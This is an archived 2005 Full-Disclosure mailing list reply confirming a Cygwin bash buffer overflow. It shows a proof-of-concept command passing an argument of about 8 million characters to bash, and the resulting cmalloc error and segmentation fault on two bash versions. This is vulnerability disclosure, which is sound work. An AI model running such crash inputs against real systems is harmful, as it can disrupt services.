RE: [Full-disclosure] Cygwin Bash Buffer Overflow (Cosmin Stejerean)
From: Paul Melson (psmelson_at_comcast.net)
Date: 05/31/05
- Previous message: Georgi Guninski: "[Full-disclosure] Re: qmail security guarantee questioned"
- In reply to: Stejerean, Cosmin: "Re: [Full-disclosure] Cygwin Bash Buffer Overflow (Cosmin Stejerean)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: "'Stejerean, Cosmin'" <cstejere@cs.depaul.edu>, <full-disclosure@lists.grok.org.uk> Date: Tue, 31 May 2005 11:00:24 -0400
>
> Which version of bash for Cygwin? I tried your PoC on the latest version
of Cygwin and everything was fine.
>
I'm able to reproduce it using 2.05b-17 (latest default) and 3.0-2:
$ bash --version
GNU bash, version 2.05b.0(1)-release (i686-pc-cygwin)
Copyright (C) 2002 Free Software Foundation, Inc.
$ /usr/bin/bash `perl -e "print 'a'x8388600"`
130 [main] bash 2876 cmalloc: cmalloc returned NULL
Segmentation fault
$ bash --version
GNU bash, version 3.00.16(2)-release (i686-pc-cygwin)
Copyright (C) 2004 Free Software Foundation, Inc.
$ /usr/bin/bash `perl -e "print 'a'x8388600"`
6 [main] bash 3496 cmalloc: cmalloc returned NULL
PaulM
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- Previous message: Georgi Guninski: "[Full-disclosure] Re: qmail security guarantee questioned"
- In reply to: Stejerean, Cosmin: "Re: [Full-disclosure] Cygwin Bash Buffer Overflow (Cosmin Stejerean)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
